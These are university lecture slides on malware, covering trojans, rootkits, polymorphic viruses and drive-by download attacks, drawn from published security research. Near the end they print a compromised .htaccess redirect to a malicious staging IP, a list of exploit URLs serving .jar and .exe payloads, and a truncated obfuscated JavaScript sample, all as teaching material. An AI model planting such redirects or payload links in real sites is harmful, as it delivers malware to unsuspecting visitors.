CS 378
Malware:
Rootkits and Viruses
Vitaly Shmatikov
slide 1
Malware
Malicious code often masquerades as good
software or attaches itself to good software
Some malicious programs need host programs
• Trojan horses, logic bombs, viruses
Others can exist and propagate independently
• Worms, automated viruses
Many infection vectors and propagation methods
Modern malware often combines trojan, rootkit,
and worm functionality
slide 2
Remote Vulnerabilities (2001-06)
[Geer]
New vulnerabilities
Exploitable targets
slide 3
Trojan Horses
A Trojan horse is malicious code hidden in an
apparently useful host program
When the host program is executed, trojan does
something harmful or unwanted
• User must be tricked into executing the host program
• In 1995, a program distributed as PKZ300B.EXE looked
like a new version of PKZIP… when executed, it
formatted your hard drive
Old-style trojans did not replicate, but today many
are spread by virus- and worm-like mechanisms
slide 4
Computer Backdoors circa 1958
AN/FSQ-7 air defense intercept computer
• Largest computer ever built
• 50,000 vacuum tubes,
275 tons, 3 MWatt of power,
½ acre of floor space
“Hula Girl” diagnostic program
• If you pointed the light gun at
her navel and pulled the trigger,
her skirt would fall off
slide 5
“Reflections on Trusting Trust”
Ken Thompson‟s 1983 Turing Award lecture
– Linked from the course website (reference section)
1. Added a backdoor-opening Trojan to login program
2. Anyone looking at source code would see this, so
changed the compiler to add backdoor at compile-time
3. Anyone looking at compiler source code would see
this, so changed the compiler to recognize when it‟s
compiling a new compiler and to insert Trojan into it
“The moral is obvious. You can‟t trust code you
did not totally create yourself. (Especially code
from companies that employ people like me).”
slide 6
Prevalence of Trojans (2004-06)
[Geer]
Percentage of enterprise
PCs carrying trojans
If you have one,
you probably have more
slide 7
Example of a Trojan
[From “The Art of Intrusion”]
Discover a helpdesk application on a Web server
• Via misconfigured FrontPage, which allows arbitrary
uploads and downloads from webroot directory
Modify its input validation routine
• Change the list of invalid characters to contain only
spaces and ~
Use SQL injection to log in with admin privileges
Hijack a dormant VPN account and log into the
internal network via VPN
slide 8
More Trojans
[From “The Art of Intrusion”]
Buffer overflow in BIND to get root on Lockheed
Martin‟s DNS server, install password sniffer
• Sniffer logs stored in directory called /var/adm/ …
Excite@Home employees connect via dialup;
attacker installs remote access trojans on their
machines via open network shares, sniffs IP
addresses of promising targets
• To bypass anti-virus scanners, use commercial remote-
access software modified to make it invisible to user
slide 9
... And More
1987: Login program on NASA computers hacked
by Chaos Computer Club, steals passwords
1999: Hacked login program at U. of Michigan
steals 1534 passwords within 23 hours
2003: AOL employees tricked into accepting
trojans via AIM, hackers get complete remote
control over their machines via IRC
• Also social engineering to steal passwords
2003: Badtrans worm installs a keystroke-logging
trojan, sends log to one of 22 email accounts
slide 10
Remote Administration Tools
Legitimate tools are often abused
• Citrix MetaFrame, WinVNC, PC Anywhere
– Complete remote control over the machine
– Easily found by port scan (e.g., port 1494 – Citrix)
• Bad installations, crackable password authentication
– “The Art of Intrusion” – hijacking remote admin tools to break
into a cash transfer company, a bank‟s IBM AS/400 server
Semi-legitimate tools
• Back Orifice, NetBus
• Rootkit-like behavior: hide themselves, log keystrokes
• Considered malicious by anti-virus software
slide 11
Communicating Via Backdoors
SSH daemon on a high port
• Communication encrypted hard to recognize for
network-based intrusion detector
• Hide SSH activity from the host by patching netstat
– May be possible to detect backdoors by observing their
activity from a network-based intrusion detection system
UDP listener
Passively sniff the network for master‟s
commands
All sorts of standard and non-standard tunnels
slide 12
Night Dragon Attacks
Started in November 2009
Targets: oil, energy, petrochemical companies
Install customized RAT tools, steal internal
documents, deliver them to China
Propagation vectors
• SQL injection on external Web servers to harvest
account credentials
• Targeted emails to company executives (spearfishing)
• Password cracking and “pass the hash” attacks
slide 13
zwShell RAT
When launched, presents a fake crash error
Type “zw.china” into the hidden password field
Can create a custom trojan or start a C&C server
• Select listening port, password for encrypting C&C
traffic, custom sound notifications when infected
machines connect or disconnect
slide 14
RAT Capabilities
“Dropper” program installs RAT DLL, launches it
as persistent Windows service, deletes itself
RAT notifies specified C&C server, waits for
instructions
Attacker at C&C server
has full control of the
infected machine, can
view files, desktop,
manipulate registry,
launch command shell
slide 15
Origin of Night Dragon Attacks
C&C servers hosted in Heze City,
Shandong Province, China
All data exfiltration to IP addresses in Beijing, on
weekdays, between 9a and 5p Beijing time
Uses generic tools from Chinese hacking sites
• Hookmsgina and WinlogonHack: password stealing
• ASPXSpy:
Web-based RAT
Make in China
E-mail: master@rootkit.net.cn
slide 16
Rootkits
Rootkit is a set of trojan system binaries
• Main characteristic: stealthiness
• Hides infection from the host‟s owner
• Often includes a sniffer (to record users‟ passwords)
• Originally on Unix
Typical infection path
• Use stolen password or dictionary attack to log in
• Use a buffer overflow in a vulnerable local program to
gain root privileges
– rdist, sendmail, loadmodule, rpc.ypupdated, lpr, passwd
• Download rootkit, unpack, compile, install
slide 17
Hiding Rookit‟s Presence on Unix
Create a hidden directory
• /dev/.lib, /usr/src/.poop and similar
• Often use invisible characters in directory name (why?)
Install hacked binaries for system programs such
as netstat, ps, ls, du, login
Can‟t detect attacker‟s processes,
files or network connections by
running standard UNIX commands!
Modified binaries have same checksum as originals
• What should be used instead of checksum?
slide 18
Function Hooking
Idea: replace pointer to a legitimate function with
an address of malicious code
Pointer hooking
• Modify the pointer in OS‟s Global Offset Table, where
function addresses are stored
“Detour” or “inline” hooking
• Insert a jump in first few bytes of a legitimate function
• This requires subverting memory protection!
Detectable by a clever rootkit detector
• Hard to hide user-land rootkit from kernel-level detector
slide 19
Kernel Rootkits
Get loaded into kernel as an external module
• For example, via compromised device driver or a badly
implemented “digital rights” module (e.g., Sony XCP)
Replace addresses in system call table, interrupt
descriptor table, etc.
If kernel modules disabled, directly patch kernel
memory through /dev/kmem (SucKIT rootkit)
Inject malicious code into a running process via
PTRACE_ATTACH and PTRACE_DETACH
• Security software is often the first injection target!
slide 20
Mebroot (Windows)
Replaces the host‟s Master Boot Record (MBR)
• First physical sector of the hard drive
• Launches before Windows loads
No registry changes, very little hooking
Stores data in physical sectors, not files
• Invisible through normal OS interface
Uses its own version of network driver API to
send and receive packets
• Invisible to “personal firewall” in Windows
Used in the Torpig botnet
slide 21
Detecting Rootkit‟s Presence
Sad way to find out
• Run out of physical disk space because of sniffer logs
• Logs are invisible because du and ls have been hacked!
Manual confirmation
• Reinstall clean ps and see what processes are running
Automatic detection
• Rootkit does not alter the data structures normally used
by netstat, ps, ls, du, ifconfig
• Host-based intrusion detection can find rootkit files
– …assuming an updated version of rootkit did not disable the
intrusion detection system!
slide 22
Viruses
Virus propagates by infecting other programs
• Automatically creates copies of itself, but to propagate,
a human has to run an infected program
• Self-propagating malware usually called worms
Many propagation methods
• Insert a copy into every executable (.COM, .EXE)
• Insert a copy into boot sectors of disks
– PC era: “Stoned” virus infected PCs booted from infected
floppies, stayed in memory, infected every inserted floppy
• Infect TSR (terminate-and-stay-resident) routines
– By infecting a common OS routine, a virus can always stay in
memory and infect all disks, executables, etc.
slide 23
First Virus: Creeper
http://history-computer.com/Internet/Maturing/Thomas.html
Written in 1971 at BBN
Infected DEC PDP-10
machines running TENEX OS
Jumped from machine to machine over ARPANET
• Copied its state over, tried to delete old copy
Payload: displayed a message
“I‟m the creeper, catch me if you can!”
Later, Reaper was written to hunt down Creeper
slide 24
Virus Techniques
Macro viruses
• A macro is an executable program embedded in a word
processing document (MS Word) or spreadsheet (Excel)
• When infected document is opened, virus copies itself
into global macro file and makes itself auto-executing
(gets invoked whenever any document is opened)
Stealth techniques
• Rootkit: infect OS so that infected files appear normal
• Code mutation and obfuscation
slide 25
Polymorphic Viruses
Encrypted viruses: constant decryptor followed
by the encrypted virus body
Polymorphic viruses: constantly create new
random encryptions of the same virus body
• Marburg (Win95), HPS (Win95), Coke (Win32)
• Virus includes an engine for creating new keys and
new encryptions of the virus body
Decryptor code constant and can be detected
• Historical note: Crypto virus decrypted its body by
brute-force key search to avoid explicit decryptor code
slide 26
Virus Detection
Simple anti-virus scanners
• Look for signatures (fragments of known virus code)
• Heuristics for recognizing code associated with viruses
– Example: polymorphic viruses often use decryption loops
• Integrity checking to find modified files
– Record file sizes, checksums, MACs (keyed hashes of contents)
Generic decryption and emulation
• Emulate CPU execution for a few hundred instructions,
recognize known body after virus decrypts
– Does not work very well against metamorphic viruses and
viruses not located near beginning of infected executable
• What if decryptor starts with millions of NOPs? slide 27
Virus Detection by Emulation
Randomly generates a new key Decrypt and execute
and corresponding decryptor code
Mutation A
Virus body
Mutation B
Mutation C
To detect an unknown mutation of a known virus ,
emulate CPU execution of until the current sequence of
instruction opcodes matches the known sequence for virus body
slide 28
Metamorphic Viruses
Obvious next step: mutate the virus body, too!
Apparition: early Win32 metamorphic virus
• Carries its source code (contains useless junk)
• Looks for compiler on infected machine
• Changes junk in its source and recompiles itself
• New binary copy looks different!
Mutation is common in macro and script viruses
• Macros/scripts are usually interpreted, not compiled
slide 29
Obfuscation and Anti-Debugging
Common in worms, viruses, bots
Goal: prevent code analysis and signature-based
detection, foil reverse-engineering
• Insert garbage opcodes and change control structure
• Different code in each copy of the virus
– Effect of code execution is the same, but difficult to detect
by passive analysis
• Packed binaries
Detect debuggers and virtual machines,
terminate execution
slide 30
Mutation Techniques
Same code, different register names
• Regswap (Win32)
Same code, different subroutine order
• BadBoy (DOS), Ghost (Win32)
Decrypt virus body instruction by instruction,
push instructions on stack, insert and remove
jumps, rebuild body on stack
• Zmorph (Win95)
• Can be detected by emulation because the rebuilt body
has a constant instruction sequence
slide 31
Mutation Engines
Real Permutating Engine/RPME, ADMutate, etc.
Large arsenal of obfuscation techniques
• Instructions reordered, branch conditions reversed
• Jumps and NOPs inserted in random places
• Garbage opcodes inserted in unreachable code areas
• Instruction sequences replaced with other instructions
that have the same effect, but different opcodes
– Mutate SUB EAX, EAX into XOR EAX, EAX or
PUSH EBP; MOV EBP, ESP into PUSH EBP; PUSH ESP; POP EBP
There is no constant, recognizable virus body
slide 32
Example of Zperm Mutation
From Szor and Ferrie, “Hunting for Metamorphic”
• Linked from the course website (reference section)
slide 33
Detour: Skype
[Biondi and Desclaux]
slide 37
Skype: Code Integrity Checking
[Biondi and Desclaux]
slide 38
Skype: Anti-Debugging
[Biondi and Desclaux]
slide 39
Skype: Control Flow Obfuscation (1)
[Biondi and Desclaux]
slide 40
Skype: Control Flow Obfuscation (2)
[Biondi and Desclaux]
slide 41
How Hard Is It to Write a Virus?
2268 matches for “virus creation tool” in CA‟s
Spyware Information Center
• Including dozens of poly- and metamorphic engines
OverWritting Virus Construction Toolkit
• "The perfect choice for beginners”
Biological Warfare Virus Creation Kit
Vbs Worm Generator (for Visual Basic worms)
• Used to create the Anna Kournikova worm
Many others
slide 42
Viruses in P2P Networks
[Shin, Jung, Balakrishnan]
Millions of users willingly download files
• KaZaA: 2.5 million users in May 2006
Easy to insert an infected file into the network
• Pretend to be an executable of a popular application
– “Adobe Photoshop 10 full.exe”, “WinZip 8.1.exe”, …
• 2006: ICQ and Trillian the most popular names
Malware can open backdoors, steal confidential
information, spread spam
• 70% of infected hosts already on DNS spam blacklists
(what does this imply?)
slide 43
Dangerous KaZaA Queries
[Shin, Jung, Balakrishnan]
slide 45
Stealth Techniques
[Shin, Jung, Balakrishnan]
Mutation: virus has multiple binary variants
• Defeats naïve signature-based detection
• Used by the most widespread viruses
– Tanked: 62 variants, SdDrop: 14 variants
Aliasing: virus places its copies under different
names into the infected host‟s sharing folder
• “ICQ Lite .exe”, “ICQ Pro 2003b.exe”, “MSN
Messenger 5.2.exe”
slide 46
Propagation via Websites
[Moshchuk et al.]
Websites with popular content
• Games: 60% of websites contain executable content,
one-third contain at least one malicious executable
• Celebrities, adult content, everything except news
– Malware in 20% of search
results for “Jessica Biel”
(2009 McAfee study)
Most popular sites with
malicious content (Oct 2005)
Most are variants of the same few
adware applications (WhenU, etc.)
slide 47
Malicious Functionality
[Moshchuk et al.]
Adware
• Display unwanted pop-up ads
Browser hijackers
• Modify home page, search tools,
redirect URLs
Trojan downloaders
• Download and install
additional malware
Dialer (expensive toll numbers)
Keylogging
slide 48
Drive-By Downloads
Website “pushes” malicious executable to user‟s
browser with inline JavaScript or pop-up window
• Naïve user may click “Yes” in the dialog box
Can install malicious software automatically by
exploiting bugs in the user‟s browser
• 1.5% of URLs - Moshchuk et al. study
• 5.3% of URLs - “Ghost Turns Zombie”
• 1.3% of Google queries - “All Your IFRAMEs Point to Us”
Many infectious sites exist only for a short time,
behave non-deterministically, change often
slide 49
Obfuscated JavaScript
[Provos et al.]
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20
LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A
/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o
%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D
...
3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0
D%0A
%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));
//-->
slide 50
“Ghost in the Browser”
Large study of malicious URLs by Provos et al.
(Google security team)
In-depth analysis of 4.5 million URLs
• About 10% malicious
Several ways to introduce exploits
• Compromised Web server
• User-contributed content
• Advertising
• Third-party widgets
slide 51
Compromised Web Server
[Provos et al.]
Vulnerabilities in phpBB2 and InvisionBoard enable
complete compromise of the underlying machine
• All servers hosted on a virtual farm become malware
distribution vectors
• Example:
Powered by
Invision Power Board(U)
v1.3.1 Final © 2003
IPS, Inc.
Exploit iframes inserted into copyright boilerplate
Test machine infected with 50 malware binaries slide 52
Redirection Using .htaccess
[Provos et al.]
After compromising the site, change .htaccess to
redirect visitors to a malicious site
Hide redirection from website owner
RewriteEngine On
RewriteCond %{HTTP _ REFERER} .*google.*$ [NC,OR] If user comes via one of
RewriteCond %{HTTP _ REFERER} .*aol.*$ [NC,OR] these search engines…
RewriteCond %{HTTP _ REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP _ REFERER} .*altavista.*$ [NC,OR] …redirect to a
RewriteCond %{HTTP _ REFERER} .*ask.*$ [NC,OR] staging server
RewriteCond %{HTTP _ REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L] …which redirects to
constantly changing set
of malicious domains
Compromised .htaccess file
frequently rewritten with new IP addresses,
restored if site owner deletes it
slide 53
User-Contributed Content
[Provos et al.]
Example: site allows user to create online polls,
claims only limited HTML support
• Sample poll:
• Interpreted by browser as
location.replace(„http://videozfree.com‟)
• Redirects user to a malware site
slide 54
Advertising
[Provos et al.]
Advertising, by definition, is ceding control of Web
content to another party
Webmasters must trust advertisers not to show
malicious content
Sub-syndication allows advertisers to rent out
their advertising space to other advertisers
But trust is not transitive!
• Webmaster may trust his advertisers, but this does not
mean he should trust those trusted by his advertisers
slide 55
Example of an Advertising Exploit
[Provos et al.]
Video sharing site includes a banner from a large US
advertising company as a single line of JavaScript…
… which generates JavaScript to be fetched from
another large US company
… which generates more JavaScript pointing to a smaller
US company that uses geo-targeting for its ads
… the ad is a single line of HTML containing an iframe to
be fetched from a Russian advertising company
… when retrieving iframe, “Location:” header redirects
browser to a certain IP address
… which serves encrypted JavaScript, attempting
multiple exploits against the browser
slide 56
Another Advertising Exploit
[Provos et al.]
Website of a Dutch radio station…
… shows a banner advertisement from a German site
… JavaScript in the ad redirects to a big US advertiser
… which redirects to another Dutch advertiser
… which redirects to yet another Dutch advertiser
… ad contains obfuscated JavaScript; when executed by
the browser, points to another script hosted in Austria
… encrypted script redirects the browser via multiple
IFRAMEs to an exploit site hosted in Austria
… site automatically installs multiple trojan downloaders
slide 57
Today (March 29, 2011)
Spotify ads hit by malware attack
slide 58
Third-Party Widgets
[Provos et al.]
Make sites “prettier” using third-party widgets
• Calendars, visitor counters, etc.
Example: free widget for keeping visitor statistics
operates fine from 2002 until 2006
In 2006, widget starts pushing exploits to all
visitors of pages linked to the counter
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe slide 59
Exploitation Mechanisms
[Provos et al.]
Bugs in browser‟s security logic or memory
vulnerabilities
Example: MS Data Access Components bug
• Compromised web page contains an iframe
• JavaScript in iframe instantiates an ActiveX object and
makes an XMLHTTP request to retrieve an executable
• Write executable to disk using Adodb.stream and
launch it using Shell.Application
Example: WebViewFolderIcon memory vuln
• Spray the heap with a large number of JavaScript string
objects containing x86 shellcode, hijack control
slide 60
Social Engineering
[Provos et al.]
Even if the user‟s browser is up-to-date and not
exploitable, can try to trick the user into
“voluntarily” installing a malicious binary
Example: website with thumbnails of adult videos
• Clicking on a thumbnail brings up a page that looks like
Windows Media Player and a prompt:
– “Windows Media Player cannot play video file. Click here to
download missing Video ActiveX object.”
• The “codec” is actually a malware binary
Fake anti-virus (“scareware”)
• January 2009: 148,000 infected URLs, 450 domains
slide 61
Malware Binaries
[Provos et al.]
Adware
Trojan downloaders
• Download other malicious binaries, rootkits, etc.
• Steal financial information, email to attacker‟s account
Majority of exploits hosted on third-party servers,
not directly on compromised sites
• Popular exploits are linked from over 10,000 URLs
• Same binary is usually hosted at multiple sites
• Most URLs rarely change their binaries, but some
switch as often as every hour
slide 62
Drive-By Botnet Infection
[Polychronakis et al. “Ghost Turns Zombie”]
Join infected computer to a botnet
Exfiltrate information (especially passwords)
• Keystroke loggers or browser hooks
Participate in large-scale spam campaigns
• Download ZIP files with target email addresses,
instructions on forming spam messages
Help malware authors debug their malware
• If attempt to install a malicious kernel driver fails,
installer uploads a small memory dump file
containing a stack trace
slide 63